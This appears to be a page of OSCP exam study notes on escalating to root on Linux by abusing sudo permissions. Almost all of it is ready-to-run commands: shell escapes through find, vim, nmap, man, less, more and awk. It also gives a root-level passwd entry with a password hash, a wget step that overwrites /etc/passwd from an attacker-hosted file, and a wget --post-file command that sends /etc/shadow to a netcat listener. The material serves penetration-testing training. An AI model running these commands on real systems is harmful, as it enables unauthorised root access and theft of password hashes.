OSCP Notes
Search…
Exploiting SUDO Users

First thing first

To Exploiting sudo user u need to find which command u have to allow.
1
sudo -l
Copied!
Escalate Privilege to root user using command:

Find

1
sudo find /etc/passwd -exec /bin/sh \;
Copied!
1
sudo find /bin -name nano -exec /bin/sh \;
Copied!

Vim

1
sudo vim -c '!sh'
Copied!

Nmap

1
# Oldway
2
sudo nmap --interactive
3
nmap> !sh
4
sh-4.1#
Copied!
1
# Latest way
2
echo "os.execute('/bin/sh')" > /tmp/shell.nse && sudo nmap --script=/tmp/shell.nse
Copied!

Man

1
sudo man man
2
# press !sh and hit enter
Copied!

Less/More

1
sudo less /etc/hosts
2
# press !sh and hit enter
Copied!
1
sudo more /etc/hosts
2
# press !sh and hit enter
Copied!

awk

1
sudo awk 'BEGIN {system("/bin/sh")}'
Copied!

nano

1
sudo nano /etc/passwd
Copied!
Add this line in /etc/passwd to order to add the user as root privilege.
1
ayed:$6$bxwJfzor$MUhUWO0MUgdkWfPPEydqgZpm.YtPMI/gaM4lVqhP21LFNWmSJ821kvJnIyoODYtBh.SF9aR7ciQBRCcw5bgjX0:0:0:root:/root:/bin/bash
Copied!
1
su ayed
Copied!

wget

    Copy Target’s /etc/passwd file to attacker machine
    modify file and add a user in passwd file which is saved in the previous step to the attacker machine.
    append this line only => ayed:$6$bxwJfzor$MUhUWO0MUgdkWfPPEydqgZpm.YtPMI/gaM4lVqhP21LFNWmSJ821kvJnIyoODYtBh.SF9aR7ciQBRCcw5bgjX0:0:0:root:/root:/bin/bash
    host that passwd file to using any web server.
    1
    sudo wget http://192.168.56.1:8080/passwd -O /etc/passwd
    2
    su ayed
    Copied!
      Note: if u want to dump file from a server like a root’s ssh key, Shadow file etc.
1
sudo wget --post-file=/etc/shadow 192.168.56.1:8080
Copied!
1
nc –lvp 8080
Copied!

apache

1
sudo apache2 -f /etc/shadow
Copied!
Last modified 1yr ago